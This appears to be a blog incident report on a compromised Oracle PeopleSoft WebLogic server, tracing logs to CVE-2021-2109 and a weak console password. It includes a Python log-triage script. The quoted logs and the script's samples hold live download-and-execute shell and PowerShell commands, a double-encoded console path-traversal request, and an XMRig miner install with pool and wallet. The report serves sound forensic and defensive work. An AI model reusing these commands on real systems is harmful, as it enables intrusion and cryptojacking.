Introduction

People working on the Oracle stack will have worked with Oracle WebLogic, the application server used to host enterprise applications.

Oracle WebLogic is a leading player in the industry, and most Oracle products, such as PeopleSoft and OBIEE, use it to host their applications. I have been working with Oracle products for many years now and had not seen a security incident in all that time, but that trust and sense of security was shattered by a phone call I received from a former colleague.

My colleague works on Oracle PeopleSoft (which uses WebLogic to host the web application). Over the call he described a strange issue: after logging into the application, the page just freezes and then does not respond to any clicks. Initially it looked like a simple case of threads getting stuck in custom code, something I should be able to figure out, so I asked him to send me all the application logs so I could take a look.

Oracle PeopleSoft Environment

The environment consisted of a demo image provided by Oracle with the following components:

All the components were installed on a pre-configured VirtualBox image, and the URL was exposed over the internet.

Log Analysis

Thinking this was a simple performance issue, I started by checking the Tuxedo application server logs but could not find anything.

So I decided to take a look at the web server logs shown in the screenshot below:

I started with PIA_Weblogic.log but could not find any issues.

Next I moved to peoplesoft.log, and the first line in the log was:

####<Jul 29, 2021 11:20:29,223 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bf9> <1627600829223> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <cd /tmp;rm -rf x86_64;wget http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;curl -O http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;> 

and the second line:

####<Jul 29, 2021 11:20:29,223 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bf9> <1627600829223> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <[/bin/sh, -c, cd /tmp;rm -rf x86_64;wget http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;curl -O http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;]> 

and the third line:

####<Jul 29, 2021 11:20:29,259 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bf9> <1627600829259> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <[Error: illegal escape sequence: A]
[Near : {... )).useDelimiter("\\\A").next();
    weblogic.servl ....}]

Someone was using the WebLogic domain to get a shell, download files from 167.88.12.77 and give those files execute permission.

The next few lines confirmed that the environment was under attack; in the line below we can see the attacker trying to download Python and execute a setup.py file using PowerShell.

####<Jul 29, 2021 11:20:29,447 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '10' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bfb> <1627600829447> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <@powershell -NoProfile -ExecutionPolicy unrestricted -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/manthey/pyexe/releases/download/v18/py27.exe', 'python.exe'); (New-Object System.Net.WebClient).DownloadFile('http://198.199.81.5/setup.py', 'setup.py');" & .\python.exe setup.py> 

The logs from July 29th are full of the attacker trying to execute PowerShell, and the next day's logs showed:

####<Jul 30, 2021 3:48:50,850 AM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '10' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000c21> <1627616930850> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <weblogic.servlet.internal.ServletRequestImpl@408df612[
POST /console/framework/skins/wlsconsole/images/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fconsole.portal HTTP/1.1
Content-Length: 1241
Accept-Encoding: gzip,deflate
Cmd: cd /tmp||cd $(find / -writable -readable -executable | head -n 1);wget http://23.94.186.34/setup -O setup||curl http://23.94.186.34/setup -O setup;chmod 777 setup;./setup;wget http://23.94.186.34/setup.py -O setup.py||curl http://23.94.186.34/setup.py -O setup.py;chmod 777 setup.py;python2 setup.py||python2.7 setup.py||python setup.py||./setup.py;echo 'ARGS="-o gulf.moneroocean.stream:18192 -u 45iHeQwQaunWXryL9YZ2egJxKvWBtWQUE4PKitu1VwYNUqkhHt6nyCTQb2dbvDRqDPXveNq94DG9uTndKcWLYNoG2uonhgH -p Network --cpu-no-yield --asm=auto --cpu-memory-pool=-1 -B"; curl http://23.94.186.34/xmrig1 -O||wget http://23.94.186.34/xmrig1 -O xmrig1;mkdir .1;mv -f xmrig1 .1/sshd;chmod 777 /.1/sshd;curl http://23.94.186.34/xmrig -O||wget http://23.94.186.34/xmrig -O xmrig;mkdir $PWD/.2;mv -f xmrig $PWD/.2/sshd;chmod 777 $PWD/.2/sshd;echo './.1/sshd $ARGS;./.2/sshd $ARGS'>.bootstrap.sh;chmod 655 bootstrap.sh;./.bootstrap.sh&
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: wget
Connection: close
Content-Type: application/x-www-form-urlencoded

]> 

From the request above it looks like the attacker somehow got access to the console and is executing commands through it. At this point I called my former colleague and asked him to zip up the contents of the /tmp folder from the VM and send it over.
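As an added triage example (my own code, not the post author's or Oracle's), the script below parses the ####<...> record format of the logs quoted above and flags the indicator shapes this incident left behind: an OS shell spawned from a servlet thread, a download-and-run chain in both its /bin/sh and PowerShell flavours, an XMRig command line, and a request path that only turns into ../ after a second round of percent-decoding. The sample records are constructed and abbreviated from the ones quoted above, with RFC 5737 documentation addresses standing in for the real download hosts; the ctx-N diagnostic-context values are placeholders.

```python
"""Triage of WebLogic server-log records for the command-injection shapes
seen above. Added example, not code from the original post or from Oracle.
SAMPLE_LOG is constructed and abbreviated; hosts are RFC 5737 addresses."""
import re
from urllib.parse import unquote, urlsplit

# A WebLogic record begins with '####<' and carries 13 '<...>' fields; the
# last one (the message) may span several lines, as the parse error above did.
RECORD_START = re.compile(r"^####<")
FIELD_NAMES = ["timestamp", "severity", "subsystem", "machine", "server",
               "thread", "user", "txid", "diagctx", "rawtime", "supp", "msgid"]
RECORD_RE = re.compile(r"^####" + r"<(.*?)> " * 12 + r"<(.*?)>?\s*$", re.S)

# Indicator patterns, each keyed on a shape visible in the records above:
# ProcessBuilder's "[/bin/sh, -c, ...]" rendering or a PowerShell cradle,
# a fetch-by-URL step, and an XMRig command line.
SHELL_SPAWN = re.compile(r"\[/bin/sh, -c, |(^|\s|@)powershell\b", re.I)
DOWNLOAD_CRADLE = re.compile(r"\b(wget|curl)\b[^;|&\n]*https?://|Download(File|String)\(", re.I)
MINER = re.compile(r"\bxmrig\b|moneroocean|--cpu-no-yield", re.I)
REQUEST_LINE = re.compile(r"^(GET|POST|PUT|DELETE)\s+(\S+)\s+HTTP/", re.M)
URL = re.compile(r"https?://[^\s'\";|&)\]]+")

# Constructed sample: four hostile records in the shapes shown on this page
# plus one benign record, so the filter has something to leave alone.
SAMPLE_LOG = r"""####<Jul 29, 2021 11:20:29,223 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <ctx-1> <1627600829223> <[severity-value: 32] > <BEA-000000> <[/bin/sh, -c, cd /tmp;wget http://192.0.2.10/.d/x86_64;chmod +x x86_64;./x86_64]>
####<Jul 29, 2021 11:20:29,259 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <ctx-1> <1627600829259> <[severity-value: 32] > <BEA-000000> <[Error: illegal escape sequence: A]
[Near : {... )).useDelimiter("\\\A").next();
    weblogic.servl ....}]
####<Jul 29, 2021 11:20:29,447 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '10' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <ctx-2> <1627600829447> <[severity-value: 32] > <BEA-000000> <@powershell -NoProfile -Command "(New-Object System.Net.WebClient).DownloadFile('http://192.0.2.11/setup.py', 'setup.py');" & .\python.exe setup.py>
####<Jul 30, 2021 3:48:50,850 AM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '10' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <ctx-3> <1627616930850> <[severity-value: 32] > <BEA-000000> <weblogic.servlet.internal.ServletRequestImpl@1[
POST /console/framework/skins/wlsconsole/images/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fconsole.portal HTTP/1.1
Cmd: cd /tmp;wget http://198.51.100.5/xmrig -O xmrig;chmod 777 xmrig;./xmrig --cpu-no-yield
User-Agent: wget

]>
####<Jul 30, 2021 4:00:00,000 AM UTC> <Notice> <WebLogicServer> <localhost> <PIA> <[ACTIVE] ExecuteThread: '1' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS Kernel>> <> <ctx-4> <1627617600000> <[severity-value: 32] > <BEA-000000> <Server state changed to RUNNING.>
"""


def split_records(text):
    """Group lines into records; a record runs until the next '####<' line."""
    records, current = [], []
    for line in text.splitlines():
        if RECORD_START.match(line) and current:
            records.append("\n".join(current))
            current = []
        current.append(line)
    if current:
        records.append("\n".join(current))
    return records


def parse_record(record):
    """Return the 13 fields as a dict, or None if the record is malformed."""
    m = RECORD_RE.match(record)
    if not m:
        return None
    fields = dict(zip(FIELD_NAMES, m.groups()[:12]))
    fields["message"] = m.group(13)
    return fields


def full_decode(path, limit=4):
    """Percent-decode until stable; returns (decoded, rounds needed).
    %252e%252e%252f needs two rounds before it reads as ../ ."""
    rounds = 0
    for _ in range(limit):
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def traversal_indicator(message):
    """Flag a request line whose path contains '../' once fully decoded."""
    m = REQUEST_LINE.search(message)
    if not m:
        return None
    decoded, rounds = full_decode(m.group(2))
    if "../" in decoded or "..\\" in decoded:
        return f"path traversal after {rounds} decode rounds: {decoded}"
    return None


def triage(log_text):
    """Return one finding per record that matches at least one indicator."""
    findings = []
    for record in split_records(log_text):
        fields = parse_record(record)
        if fields is None:
            continue
        msg = fields["message"]
        hits = [name for name, pat in (("shell-spawn", SHELL_SPAWN),
                                       ("download-cradle", DOWNLOAD_CRADLE),
                                       ("miner-config", MINER)) if pat.search(msg)]
        trav = traversal_indicator(msg)
        if trav:
            hits.append(trav)
        if hits:
            findings.append({"timestamp": fields["timestamp"], "thread": fields["thread"],
                             "indicators": hits, "urls": sorted(set(URL.findall(msg)))})
    return findings


def hosts_contacted(findings):
    """Distinct download hosts across all findings, for blocking and hunting."""
    hosts = {urlsplit(u).hostname for f in findings for u in f["urls"]}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f["timestamp"], f["thread"], f["indicators"], f["urls"])
    print("hosts:", hosts_contacted(results))
```

Running it prints one line per flagged record and the list of download hosts at the end. The repeated decoding step is what exposes the console.portal traversal: a single decode pass, or a raw grep for ../, sees only %2e%2e%2f and misses it. The multi-line error record is parsed correctly but matches none of the indicator patterns, so add a pattern for it if you want that noise surfaced as well.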

Below is a screenshot of the contents of the /tmp folder:

One look at the contents and I knew the system was compromised, but the question was how the attacker got access to the console.

To confirm, I uploaded setup.py to VirusTotal, which confirmed that the system was infected.

CVE-2021-2109

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. The RCE vulnerability exists in the console component of the WebLogic Server. The vulnerability can be exploited by sending a crafted HTTP request and can lead to complete control of the host.

Conclusion

In case you are still behind on the critical patches released by Oracle, please go ahead and install them as soon as possible. Also, make sure to treat the WebLogic console with the respect it deserves: this sort of attack takes just a single well-crafted HTTP request and an easy-to-break password (Passw0rd in this case) to fully compromise the system. On the affected server, the attacker also tried a brute-force attack against the root password but was not successful. For further analysis of the malware, please continue watching this space for more details.

References:

  1. https://nvd.nist.gov/vuln/detail/CVE-2021-2109
